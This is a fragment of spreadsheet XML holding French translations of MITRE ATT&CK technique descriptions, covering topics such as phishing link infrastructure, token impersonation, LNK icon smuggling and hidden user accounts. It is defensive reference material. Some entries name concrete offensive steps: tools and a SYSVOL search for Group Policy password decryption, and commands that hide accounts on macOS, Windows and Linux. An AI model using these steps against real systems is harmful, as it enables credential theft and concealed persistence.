    <t>Les adversaires peuvent mettre en place des ressources référencées par un lien qui peut être utilisé lors du ciblage. Un adversaire peut compter sur le fait qu’un utilisateur clique sur un lien malveillant afin de divulguer des informations (y compris des informations d’identification) ou d’obtenir une exécution, comme dans [Lien malveillant](https://attack.mitre.org/techniques/T1204/001). Les liens peuvent être utilisés pour le spearphishing, par exemple pour envoyer un e-mail accompagné d’un texte d’ingénierie sociale afin d’inciter l’utilisateur à cliquer activement ou à copier et coller une URL dans un navigateur. Avant d’effectuer un hameçonnage pour obtenir des informations (comme dans [Lien de spearphishing](https://attack.mitre.org/techniques/T1598/003)) ou un hameçonnage pour obtenir un premier accès à un système (comme dans [Lien de spearphishing](https://attack.mitre.org/techniques/T1566/002)), un adversaire doit configurer les ressources d’une cible de lien pour le lien de spearphishing. 
En règle générale, les ressources d’une cible de lien sont une page HTML qui peut inclure un script côté client tel que [JavaScript](https://attack.mitre.org/techniques/T1059/007) pour décider du contenu à proposer à l’utilisateur. Les adversaires peuvent cloner des sites légitimes pour servir de cible de lien, ce qui peut inclure le clonage de pages de connexion de services Web légitimes ou de pages de connexion d’organisation dans le but de collecter des informations d’identification pendant [Lien de spearphishing](https://attack.mitre.org/techniques/T1598/003). (Citation : Malwarebytes Silent Librarian octobre 2020)(Citation : Proofpoint TA407 septembre 2019) Les adversaires peuvent également [Télécharger un logiciel malveillant](https://attack.mitre.org/techniques/T1608/001) et faire pointer la cible du lien vers un logiciel malveillant pour téléchargement/exécution par l’utilisateur.
Les adversaires peuvent acheter des domaines similaires à des domaines légitimes (par exemple : homoglyphes, typosquattage, domaine de premier niveau différent, etc.) lors de l’acquisition d’infrastructures ([Domaines](https://attack.mitre.org/techniques/T1583/001)) pour faciliter [Lien malveillant](https://attack.mitre.org/techniques/T1204/001).
Des liens peuvent être écrits par des adversaires pour masquer la véritable destination afin de tromper les victimes en abusant du schéma d’URL et en augmentant l’efficacité du phishing. (Citation : Masquage Kaspersky)(Citation : mandiant-masking)
Les adversaires peuvent également utiliser des comptes gratuits ou payants sur des services de raccourcissement de liens et des fournisseurs de plates-formes en tant que service pour héberger des cibles de liens tout en profitant des domaines largement fiables de ces fournisseurs pour éviter d’être bloqués tout en redirigeant les victimes vers des pages malveillantes. (Citation : Redirection Netskope GCP)(Citation : Netskope Cloud Phishing)(Citation : Intezer App Service Phishing)(Citation : Cofense-redirect) En outre, les adversaires peuvent diffuser une variété de liens malveillants par le biais d’URI/URL générées de manière unique (y compris des liens à usage unique et uniques). (Citation : Schéma d’URL iOS)(Citation : URI)(citation : utilisation de l’URI)(citation : URI unique) Enfin, les adversaires peuvent tirer parti de la nature décentralisée de l’InterPlanetary File System (IPFS) pour héberger des cibles de liens difficiles à supprimer. (Référence : Talos IPFS 2022)
https://attack.mitre.org/techniques/T1608/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer plusieurs étapes de commandement et de contrôle qui sont employées dans des conditions différentes ou pour certaines fonctions. L’utilisation de plusieurs étages peut obscurcir le canal de commande et de contrôle et rendre la détection plus difficile.
Les outils d’accès à distance rappelleront le serveur de commande et de contrôle de premier niveau pour obtenir des instructions. La première étape peut avoir des capacités automatisées pour collecter des informations de base sur l’hôte, mettre à jour les outils et télécharger des fichiers supplémentaires. Un deuxième outil d’accès à distance (RAT) peut être téléchargé à ce stade pour rediriger l’hôte vers le serveur de commande et de contrôle de deuxième étape. La deuxième étape sera probablement plus complète et permettra à l’adversaire d’interagir avec le système par le biais d’une coquille inversée et de fonctionnalités RAT supplémentaires.
Les différentes étapes seront probablement hébergées séparément, sans chevauchement d’infrastructure. Le chargeur peut également disposer de rappels de première étape de secours ou de [Canaux de secours](https://attack.mitre.org/techniques/T1008) au cas où le chemin de communication initial de la première étape serait découvert et bloqué.
https://attack.mitre.org/techniques/T1104</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des ressources monétaires à des cibles par le biais de l’extorsion, de l’ingénierie sociale, du vol technique ou d’autres méthodes visant à leur propre gain financier au détriment de la disponibilité de ces ressources pour les victimes. Le vol financier est l’objectif ultime de plusieurs types de campagnes populaires, notamment l’extorsion par ransomware, la compromission des e-mails professionnels (BEC) et la fraude, le piratage de banques, le piratage bancaire et l’exploitation des réseaux de cryptomonnaies. (Citation : BBC-Ronin) 
Les adversaires peuvent [Compromettre des comptes](https://attack.mitre.org/techniques/T1586) pour effectuer des transferts de fonds non autorisés. (Citation : Rapport sur la criminalité sur Internet 2022) Dans le cas d’une compromission d’e-mail professionnel ou d’une fraude par e-mail, un adversaire peut utiliser [Usurpation d’identité](https://attack.mitre.org/techniques/T1656) d’une entité de confiance. Une fois que l’ingénierie sociale a réussi, les victimes peuvent être trompées et envoyer de l’argent sur des comptes financiers contrôlés par un adversaire. (Référence : FBI-BEC) Cela crée un risque de victimes multiples (c’est-à-dire des comptes compromis ainsi que la perte monétaire ultime) dans les incidents impliquant un vol financier. (Référence : VEC)
L’extorsion par ransomware peut se produire, par exemple, lorsqu’un adversaire exige un paiement d’une victime après [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation : NYT-Colonial) et [Exfiltration](https://attack.mitre.org/tactics/TA0010) de données, suivi d’une menace de fuite de données sensibles au public si le paiement n’est pas effectué à l’adversaire. (Citation : Mandiant-leaks) Les adversaires peuvent utiliser des sites de fuite dédiés pour distribuer les données des victimes. (Citation : Crowdstrike-leaks)
En raison de l’impact commercial potentiellement immense du vol financier, un adversaire peut abuser de la possibilité d’un vol financier et rechercher un gain financier pour détourner l’attention de ses véritables objectifs tels que la destruction de données(https://attack.mitre.org/techniques/T1485) et l’interruption de l’activité. (Citation : AP-NotPetya)
https://attack.mitre.org/techniques/T1657</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des garde-fous d’exécution pour limiter l’exécution ou les actions en fonction des conditions spécifiques fournies par l’adversaire et de l’environnement qui devraient être présentes sur la cible. Les garde-fous garantissent qu’une charge utile ne s’exécute que contre une cible prévue et réduisent les dommages collatéraux de la campagne d’un adversaire. (Citation : FireEye Kevin Mandia Guardrails) Les valeurs qu’un adversaire peut fournir à propos d’un système ou d’un environnement cible à utiliser comme garde-fous peuvent inclure des noms de partage de réseau spécifiques, des périphériques physiques attachés, des fichiers, des domaines Active Directory (AD) joints et des adresses IP locales/externes. (Citation : FireEye Outlook décembre 2019)
Les garde-corps peuvent être utilisés pour empêcher l’exposition des capacités dans des environnements qui ne sont pas destinés à être compromis ou à être exploités dans dedans. Cette utilisation des garde-fous est distincte de la [Virtualisation/Évasion du bac à sable](https://attack.mitre.org/techniques/T1497). Alors que l’utilisation de [Virtualisation/Évasion de bac à sable](https://attack.mitre.org/techniques/T1497) peut impliquer la vérification des valeurs connues du bac à sable et la poursuite de l’exécution uniquement s’il n’y a pas de correspondance, l’utilisation de garde-fous implique la vérification d’une valeur attendue spécifique à la cible et la poursuite de l’exécution uniquement s’il existe une telle correspondance.
Les adversaires peuvent identifier et bloquer certains user-agents pour échapper aux défenses et restreindre la portée de leur attaque aux victimes et aux plateformes sur lesquelles elle sera la plus efficace. Un agent utilisateur identifie lui-même des données telles que l’application logicielle, le système d’exploitation, le fournisseur et la version de l’utilisateur. Les adversaires peuvent vérifier l’identification du système d’exploitation par les agents utilisateurs, puis ne diffuser que des logiciels malveillants pour les logiciels exploitables tout en ignorant tous les autres systèmes d’exploitation. (Citation : Trellix-Qakbot)
https://attack.mitre.org/techniques/T1480</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer des objets dans l’infrastructure de stockage cloud. Les adversaires peuvent utiliser ces informations lors de la découverte automatisée pour façonner des comportements ultérieurs, notamment en demandant tous les objets ou des objets spécifiques à partir du stockage dans le cloud.  À l’instar de [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) sur un hôte local, après avoir identifié les services de stockage disponibles (c’est-à-dire [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580))), les adversaires peuvent accéder au contenu/aux objets stockés dans l’infrastructure cloud.
Les fournisseurs de services cloud proposent des API permettant aux utilisateurs d’énumérer les objets stockés dans le stockage cloud. Par exemple, ListObjectsV2 dans AWS (Citation : ListObjectsV2) et List Blobs dans Azure (Citation : List Blobs) .
https://attack.mitre.org/techniques/T1619</t>
  </si>
  <si>
    <t>Les adversaires peuvent falsifier des cookies Web qui peuvent être utilisés pour accéder à des applications Web ou à des services Internet. Les applications et services Web (hébergés dans des environnements cloud SaaS ou des serveurs sur site) utilisent souvent des cookies de session pour authentifier et autoriser l’accès des utilisateurs.
Les adversaires peuvent générer ces cookies afin d’accéder aux ressources Web. Cela diffère de [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) et d’autres comportements similaires en ce sens que les cookies sont nouveaux et forgés par l’adversaire, plutôt que volés ou interceptés auprès d’utilisateurs légitimes. La plupart des applications Web courantes ont des valeurs de cookies standardisées et documentées qui peuvent être générées à l’aide des outils ou des interfaces fournis. (Citation : Passez le cookie) La génération de cookies Web nécessite souvent des valeurs secrètes, telles que des mots de passe, des [clés privées](https://attack.mitre.org/techniques/T1552/004) ou d’autres valeurs de graine cryptographiques.
Une fois falsifiés, les adversaires peuvent utiliser ces cookies Web pour accéder à des ressources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), qui peuvent contourner les mécanismes de protection multifactoriels et autres mécanismes de protection d’authentification. (Citation : Volexity SolarWinds)(Citation : Passez le cookie)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019)
https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer les journaux du système et des services pour trouver des données utiles. Ces journaux peuvent mettre en évidence divers types d’informations précieuses pour un adversaire, telles que les enregistrements d’authentification des utilisateurs ([Account Discovery](https://attack.mitre.org/techniques/T1087)), les logiciels de sécurité ou vulnérables ([Software Discovery](https://attack.mitre.org/techniques/T1518)), ou les hôtes au sein d’un réseau compromis ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Les fichiers binaires de l’hôte peuvent être exploités pour collecter les journaux système. Par exemple, l’utilisation de « wevtutil.exe » ou de [PowerShell](https://attack.mitre.org/techniques/T1059/001) sous Windows pour accéder et/ou exporter des informations sur les événements de sécurité. (Citation : Rapport d’information sur la menace WithSecure Lazarus-NoPineapple 2023)(Citation : Le cadet Blizzard émerge comme un nouvel acteur de menace) Dans les environnements cloud, les adversaires peuvent tirer parti d’utilitaires tels que le « CollectGuestLogs.exe » de l’agent de machine virtuelle Azure pour collecter les journaux de sécurité à partir d’une infrastructure hébergée dans le cloud. (Citation : Échange de carte SIM et abus de la console série Microsoft Azure)
Les adversaires peuvent également cibler une infrastructure de journalisation centralisée telle que les SIEM. Les journaux peuvent également être exportés en bloc et envoyés à une infrastructure contrôlée par l’adversaire pour une analyse hors ligne.
En plus d’acquérir une meilleure compréhension de l’environnement, les adversaires peuvent également surveiller les journaux en temps réel pour suivre les procédures de réponse aux incidents. Cela peut leur permettre d’ajuster leurs techniques afin de maintenir leur persistance ou d’échapper aux défenses. (Référence : Permiso GUI-Vil 2023)
https://attack.mitre.org/techniques/T1654</t>
  </si>
  <si>
    <t>Les adversaires peuvent dupliquer puis usurper l’identité du jeton existant d’un autre utilisateur pour élever les privilèges et contourner les contrôles d’accès. Par exemple, un adversaire peut dupliquer un jeton existant à l’aide de « DuplicateToken » ou de « DuplicateTokenEx ». (Citation : Fonction DuplicateToken) Le jeton peut ensuite être utilisé avec « ImpersonateLoggedOnUser » pour permettre au thread appelant d’emprunter l’identité d’un utilisateur connecté dans le contexte de sécurité d’un utilisateur connecté, ou avec « SetThreadToken » pour attribuer le jeton emprunté à un thread.
Un adversaire peut effectuer [Usurpation d’identité/Vol de jeton](https://attack.mitre.org/techniques/T1134/001) lorsqu’il dispose d’un processus spécifique existant auquel il souhaite attribuer le jeton dupliqué. Par exemple, cela peut être utile lorsque l’utilisateur cible dispose d’une session d’ouverture de session non réseau sur le système.
Lorsqu’un adversaire utilise plutôt un jeton dupliqué pour créer un nouveau processus plutôt que de l’attacher à un processus existant, il peut également [Créer un processus avec un jeton](https://attack.mitre.org/techniques/T1134/002) à l’aide de 'CreateProcessWithTokenW' ou 'CreateProcessAsUserW'. [Usurpation d’identité/vol de jetons](https://attack.mitre.org/techniques/T1134/001) se distingue également de [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) en ce sens qu’il fait référence à la duplication d’un token existant, plutôt qu’à la création d’un nouveau.
https://attack.mitre.org/techniques/T1134/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données vers un référentiel de code plutôt que sur leur canal de commande et de contrôle principal. Les dépôts de code sont souvent accessibles via une API (ex : https://api.github.com). L’accès à ces API se fait souvent via HTTPS, ce qui donne à l’adversaire un niveau de protection supplémentaire.
L’exfiltration vers un référentiel de code peut également fournir une couverture importante à l’adversaire s’il s’agit d’un service populaire déjà utilisé par les hôtes du réseau.
https://attack.mitre.org/techniques/T1567/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent se connecter à des services cloud accessibles dans un environnement compromis à l’aide de [comptes valides](https://attack.mitre.org/techniques/T1078) synchronisés ou fédérés avec les identités des utilisateurs locaux. L’adversaire peut alors effectuer des actions de gestion ou accéder aux ressources hébergées dans le cloud en tant qu’utilisateur connecté. 
De nombreuses entreprises fédèrent les identités des utilisateurs gérées de manière centralisée vers les services cloud, ce qui permet aux utilisateurs de se connecter avec leurs informations d’identification de domaine afin d’accéder au plan de contrôle du cloud. De même, les adversaires peuvent se connecter aux services cloud disponibles via la console web ou via l’interface de ligne de commande (CLI) cloud (par exemple, [Cloud API](https://attack.mitre.org/techniques/T1059/009)), à l’aide de commandes telles que &lt;code&gt;Connect-AZAccount&lt;/code&gt; pour Azure PowerShell, &lt;code&gt;Connect-MgGraph&lt;/code&gt; pour Microsoft Graph PowerShell et &lt;code&gt;gcloud auth login&lt;/code&gt; pour l’interface de ligne de commande Google Cloud.
Dans certains cas, les adversaires peuvent être en mesure de s’authentifier auprès de ces services via [Jeton d’accès à l’application](https://attack.mitre.org/techniques/T1550/001) au lieu d’un nom d’utilisateur et d’un mot de passe.
https://attack.mitre.org/techniques/T1021/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le cognement de port pour masquer les ports ouverts utilisés pour la persistance ou la commande et le contrôle. Pour activer un port, un adversaire envoie une série de tentatives de connexion à une séquence prédéfinie de ports fermés. Une fois la séquence terminée, l’ouverture d’un port est souvent effectuée par le pare-feu basé sur l’hôte, mais peut également être mise en œuvre par un logiciel personnalisé.
Cette technique a été observée à la fois pour l’ouverture dynamique d’un port d’écoute et pour l’initiation d’une connexion à un serveur d’écoute sur un système différent.
L’observation des paquets de signaux pour déclencher la communication peut être effectuée par différentes méthodes. Un moyen, mis en œuvre à l’origine par Cd00r (Citation : Hartrell cd00r 2002), est d’utiliser les bibliothèques libpcap pour renifler les paquets en question. Une autre méthode exploite les sockets bruts, ce qui permet au logiciel malveillant d’utiliser des ports déjà ouverts pour être utilisés par d’autres programmes.
https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent faire passer en contrebande des commandes pour télécharger des charges utiles malveillantes au-delà des filtres de contenu en les cachant dans des fichiers de raccourcis Windows apparemment inoffensifs. Fichiers de raccourci Windows (. LNK) incluent de nombreux champs de métadonnées, y compris un champ d’emplacement d’icône (également connu sous le nom de « IconEnvironmentDataBlock ») conçu pour spécifier le chemin d’accès à un fichier d’icône qui doit être affiché pour le fichier LNK dans un répertoire hôte. 
Les adversaires peuvent abuser de ces métadonnées LNK pour télécharger des charges utiles malveillantes. Par exemple, des adversaires ont été observés en train d’utiliser des fichiers LNK comme charges utiles de phishing pour diffuser des logiciels malveillants. Une fois appelées (par exemple, [Fichier malveillant](https://attack.mitre.org/techniques/T1204/002)), les charges utiles référencées via des URL externes dans le champ d’emplacement de l’icône LNK peuvent être téléchargées. Ces fichiers peuvent également être invoqués par les arguments [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059)/[Exécution de proxy binaire système](https://attack.mitre.org/techniques/T1218) dans le champ de chemin cible de la LNK. (Citation : Raccourci de déprotection)(Citation : Booby Trap Shortcut 2017)
La contrebande d’icônes LNK peut également être utilisée après la compromission, par exemple par des scripts malveillants exécutant un LNK sur un hôte infecté pour télécharger des charges utiles malveillantes supplémentaires.
https://attack.mitre.org/techniques/T1027/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’inscrire à des services Web qui peuvent être utilisés lors du ciblage. Il existe une variété de sites Web populaires permettant aux adversaires de s’inscrire à un service Web qui peut être utilisé de manière abusive au cours des étapes ultérieures du cycle de vie de l’adversaire, par exemple pendant le commandement et le contrôle ([Service Web](https://attack.mitre.org/techniques/T1102)), [Exfiltration sur le service Web](https://attack.mitre.org/techniques/T1567) ou [Phishing](https://attack.mitre.org/techniques/T1566). L’utilisation de services courants, tels que ceux proposés par Google ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. (Référence : FireEye APT29) En utilisant un service Web, les adversaires peuvent rendre difficile le lien physique entre les opérations et eux.
https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent envoyer des messages de spearphishing avec une pièce jointe malveillante pour obtenir des informations sensibles qui peuvent être utilisées lors du ciblage. Le spearphishing pour obtenir des informations est une tentative d’inciter les cibles à divulguer des informations, souvent des informations d’identification ou d’autres informations exploitables. Le spearphishing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plusieurs messages apparemment urgents.
Toutes les formes de spearphishing sont des actions d’ingénierie sociale transmises par voie électronique et ciblent une personne, une entreprise ou un secteur d’activité spécifique. Dans ce scénario, les adversaires joignent un fichier à l’e-mail de spearphishing et s’appuient généralement sur le destinataire pour remplir les informations, puis renvoyer le fichier. (citation : Pièce jointe Sophos)(Citation : Wikipédiatrie de GitHub) Le texte de l’e-mail de spearphishing tente généralement de donner une raison plausible pour laquelle le fichier devrait être rempli, comme une demande d’informations de la part d’un partenaire commercial. Les adversaires peuvent également utiliser des informations provenant d’efforts de reconnaissance antérieurs (par exemple : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Rechercher des sites Web appartenant à des victimes](https://attack.mitre.org/techniques/T1594)) pour créer des leurres persuasifs et crédibles.
https://attack.mitre.org/techniques/T1598/002</t>
  </si>
  <si>
    <t>Un adversaire peut s’appuyer sur des actions spécifiques de la part d’un utilisateur afin d’obtenir l’exécution. Les utilisateurs peuvent être soumis à l’ingénierie sociale pour les amener à exécuter du code malveillant, par exemple en ouvrant un fichier de document ou un lien malveillant. Ces actions de l’utilisateur sont généralement observées comme des comportements de suivi de formes de [Phishing](https://attack.mitre.org/techniques/T1566).
Bien que [User Execution](https://attack.mitre.org/techniques/T1204) se produise fréquemment peu de temps après l’accès initial, il peut se produire à d’autres phases d’une intrusion, par exemple lorsqu’un adversaire place un fichier dans un répertoire partagé ou sur le bureau d’un utilisateur en espérant qu’un utilisateur cliquera dessus. Cette activité peut également être observée peu de temps après [Spearphishing interne](https://attack.mitre.org/techniques/T1534).
Les adversaires peuvent également inciter les utilisateurs à effectuer des actions telles que :
* Activation du [Logiciel d’accès à distance](https://attack.mitre.org/techniques/T1219), permettant un contrôle direct du système à l’adversaire
* Exécuter du JavaScript malveillant dans leur navigateur, permettant aux adversaires de [Voler le cookie de session Web](https://attack.mitre.org/techniques/T1539)s(Citation : Talos Roblox Scam 2023)(Citation : Krebs Discord Bookmarks 2023)
* Téléchargement et exécution de logiciels malveillants pour [User Execution](https://attack.mitre.org/techniques/T1204)
* Forcer les utilisateurs à copier, coller et exécuter manuellement du code malveillant (Citation : Reliaquest-execution)
Par exemple, les escroqueries au support technique peuvent être facilitées par le biais du [phishing](https://attack.mitre.org/techniques/T1566), de l’hameçonnage vocal ou de diverses formes d’interaction avec l’utilisateur. Les adversaires peuvent utiliser une combinaison de ces méthodes, telles que l’usurpation d’identité et la promotion de numéros gratuits ou de centres d’appels utilisés pour diriger les victimes vers des sites Web malveillants, pour livrer et exécuter des charges utiles contenant des logiciels malveillants ou un [logiciel d’accès à distance](https://attack.mitre.org/techniques/T1219). (Citation : Attaque téléphonique)
https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>Un adversaire peut dégrader les systèmes internes d’une organisation dans le but d’intimider ou d’induire en erreur les utilisateurs, discréditant ainsi l’intégrité des systèmes. Cela peut prendre la forme de modifications apportées à des sites Web internes ou directement aux systèmes de l’utilisateur avec le remplacement du fond d’écran. (Citation : Novetta Blockbuster) Des images dérangeantes ou offensantes peuvent être utilisées dans le cadre de [Dégradation interne](https://attack.mitre.org/techniques/T1491/001) afin de causer de l’inconfort à l’utilisateur ou de faire pression sur le respect des messages d’accompagnement. Étant donné que la dégradation interne des systèmes expose la présence d’un adversaire, elle a souvent lieu après que d’autres objectifs d’intrusion ont été atteints. (Citation : Logiciel malveillant destructeur Novetta Blockbuster)
https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des utilisateurs masqués pour masquer la présence des comptes d’utilisateurs qu’ils créent ou modifient. Les administrateurs peuvent vouloir masquer des utilisateurs lorsqu’il existe de nombreux comptes d’utilisateurs sur un système donné ou s’ils souhaitent masquer leurs comptes d’administration ou autres comptes de gestion à d’autres utilisateurs. 
Sous macOS, les adversaires peuvent créer ou modifier un utilisateur à masquer en manipulant les fichiers plist, les attributs de dossier et les attributs utilisateur. Pour éviter qu’un utilisateur ne s’affiche sur l’écran de connexion et dans les Préférences Système, les adversaires peuvent définir l’ID utilisateur sur une valeur inférieure à 500 et définir la valeur de clé &lt;code&gt;Hide500Users&lt;/code&gt; sur &lt;code&gt;TRUE&lt;/code&gt; dans le fichier &lt;code&gt;plist /Library/Preferences/com.apple.loginwindow&lt;/code&gt;. (Citation : Cybereason OSX Pirrit) Chaque utilisateur est associé à un ID utilisateur. Lorsque la valeur de la clé &lt;code&gt;Hide500Users&lt;/code&gt; est définie sur &lt;code&gt;TRUE,&lt;/code&gt; les utilisateurs dont l’ID utilisateur est inférieur à 500 n’apparaissent pas sur l’écran de connexion et dans les Préférences Système. À l’aide de la ligne de commande, les adversaires peuvent utiliser l’utilitaire &lt;code&gt;dscl&lt;/code&gt; pour créer des comptes d’utilisateurs masqués en définissant l’attribut &lt;code&gt;IsHidden&lt;/code&gt; sur &lt;code&gt;1&lt;/code&gt;. Les adversaires peuvent également masquer le dossier d’accueil d’un utilisateur en remplaçant les &lt;code&gt;chflags&lt;/code&gt; par hidden. (Citation : Assistance Apple Masquer un compte utilisateur) 
De la même manière, les adversaires peuvent masquer des comptes d’utilisateurs dans Windows. Les adversaires peuvent définir la valeur de la clé de registre &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; sur &lt;code&gt;0&lt;/code&gt; pour un utilisateur spécifique afin d’empêcher cet utilisateur d’être répertorié sur l’écran d’ouverture de session. (Citation : FireEye SMOKEDHAM, juin 2021)(Référence : US-CERT TA18-074A)
Sur les systèmes Linux, les adversaires peuvent masquer les comptes d’utilisateurs à partir de l’écran de connexion, également appelé accueil. La méthode qu’un adversaire peut utiliser dépend du gestionnaire d’affichage que la distribution utilise actuellement. Par exemple, sur un système Ubuntu utilisant le gestionnaire d’affichage GNOME (GDM), les comptes peuvent être cachés à l’accueil à l’aide de la commande &lt;code&gt;gsettings&lt;/code&gt; (ex : &lt;code&gt;sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true&lt;/code&gt;). (citation : Masquer les comptes d’utilisateurs GDM) Les gestionnaires d’affichage ne sont pas ancrés à des distributions spécifiques et peuvent être modifiés par un utilisateur ou un adversaire.
https://attack.mitre.org/techniques/T1564/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer de nouveaux jetons et usurper l’identité des utilisateurs pour augmenter les privilèges et contourner les contrôles d’accès. Par exemple, si un adversaire dispose d’un nom d’utilisateur et d’un mot de passe, mais que l’utilisateur n’est pas connecté au système, il peut alors créer une session d’ouverture de session pour l’utilisateur à l’aide de la fonction « LogonUser ». (Citation : Fonction LogonUserW) La fonction renverra une copie du jeton d’accès de la nouvelle session et l’adversaire peut utiliser « SetThreadToken » pour attribuer le jeton à un thread.
Ce comportement est distinct de [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) en ce sens qu’il fait référence à la création d’un nouveau token utilisateur au lieu de voler ou de dupliquer un token existant.
https://attack.mitre.org/techniques/T1134/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des informations d’identification non sécurisées dans les préférences de stratégie de groupe (GPP). Les GPP sont des outils qui permettent aux administrateurs de créer des politiques de domaine avec des informations d’identification intégrées. Ces règles permettent aux administrateurs de définir des comptes locaux. (Référence : Microsoft GPP 2016)
Ces stratégies de groupe sont stockées dans SYSVOL sur un contrôleur de domaine. Cela signifie que tout utilisateur du domaine peut afficher le partage SYSVOL et déchiffrer le mot de passe (à l’aide de la clé AES qui a été rendue publique). (Citation : Clé Microsoft GPP)
Les outils et scripts suivants peuvent être utilisés pour collecter et déchiffrer le fichier de mot de passe à partir des fichiers XML de préférence de stratégie de groupe :
* Module de post-exploitation de Metasploit : &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation : obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Sur le partage SYSVOL, les adversaires peuvent utiliser la commande suivante pour énumérer les fichiers XML GPP potentiels : &lt;code&gt;dir /s * .xml&lt;/code&gt;
https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un protocole réseau crypté de manière asymétrique autre que celui du canal de commande et de contrôle existant. Les données peuvent également être envoyées à un autre emplacement réseau à partir du serveur de commande et de contrôle principal. 
Les algorithmes de chiffrement asymétriques sont ceux qui utilisent des clés différentes à chaque extrémité du canal. Également connue sous le nom de cryptographie à clé publique, elle nécessite des paires de clés cryptographiques capables de chiffrer/déchiffrer les données de la clé correspondante. Chaque extrémité des canaux de communication nécessite une clé privée (uniquement dans le cortège de cette entité) et la clé publique de l’autre entité. Les clés publiques de chaque entité sont échangées avant le début des communications chiffrées. 
Les protocoles réseau qui utilisent le chiffrement asymétrique (tels que HTTPS/TLS/SSL) utilisent souvent le chiffrement symétrique une fois les clés échangées. Les adversaires peuvent choisir d’utiliser ces mécanismes cryptés qui sont intégrés dans un protocole.
https://attack.mitre.org/techniques/T1048/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes cloud. Les comptes cloud sont ceux créés et configurés par une organisation pour une utilisation par les utilisateurs, l’assistance à distance, les services ou l’administration des ressources au sein d’un fournisseur de services cloud ou d’une application SaaS.
Avec l’accès authentifié, il existe plusieurs outils qui peuvent être utilisés pour trouver des comptes. L’applet de commande PowerShell &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; peut être utilisée pour obtenir des noms de compte attribués à un rôle ou à un groupe d’autorisations dans Office 365. (Citation : Microsoft msolrolemember)(Citation : GitHub Raindance) Azure CLI (AZ CLI) fournit également une interface permettant d’obtenir des comptes d’utilisateur avec un accès authentifié à un domaine. La commande &lt;code&gt;az ad user list&lt;/code&gt; répertorie tous les utilisateurs d’un domaine. (Citation : Microsoft AZ CLI)(Citation : Black Hills Red Teaming MS AD Azure, 2018) 
La commande AWS &lt;code&gt;aws iam list-users&lt;/code&gt; peut être utilisée pour obtenir une liste d’utilisateurs dans le compte actuel, tandis &lt;code&gt;qu’aws iam list-roles&lt;/code&gt; peut obtenir des rôles IAM qui ont un préfixe de chemin d’accès spécifié. (Citation : Rôles de la liste AWS)(Citation : Utilisateurs de la liste AWS) Dans GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; et &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; peuvent être utilisés pour obtenir une liste des comptes de service et des utilisateurs d’un projet. (citation : Google Cloud - API de liste de comptes IAM Servie)
https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir des informations sur l’exécution de processus sur un système. Les informations obtenues pourraient être utilisées pour comprendre les logiciels et les applications courants qui s’exécutent sur les systèmes du réseau. L’administrateur ou un accès élevé peut fournir de meilleurs détails sur le processus. Les adversaires peuvent utiliser les informations de [Process Discovery](https://attack.mitre.org/techniques/T1057) lors de la découverte automatisée pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Dans les environnements Windows, les adversaires pouvaient obtenir des détails sur l’exécution des processus à l’aide de l’utilitaire [Tasklist](https://attack.mitre.org/software/S0057) via [cmd](https://attack.mitre.org/software/S0106) ou &lt;code&gt;Get-Process&lt;/code&gt; via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Des informations sur les processus peuvent également être extraites de la sortie des appels [Native API](https://attack.mitre.org/techniques/T1106) tels que &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;. Sous Mac et Linux, cela se fait à l’aide de la commande &lt;code&gt;ps&lt;/code&gt;. Les adversaires peuvent également choisir d’énumérer les processus via « /proc ». 
Sur les périphériques réseau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show processes' peuvent être utilisées pour afficher les processus en cours d’exécution. (Référence : US-CERT-TA18-106A)(Référence : show_processes_cisco_cmd)
https://attack.mitre.org/techniques/T1057</t>
  </si>
  <si>
    <t>Les adversaires peuvent altérer l’enregistrement de l’historique des commandes pour masquer les commandes qu’ils exécutent sur un système compromis. Divers interpréteurs de commandes gardent une trace des commandes que les utilisateurs saisissent dans leur terminal afin que les utilisateurs puissent retracer ce qu’ils ont fait. 
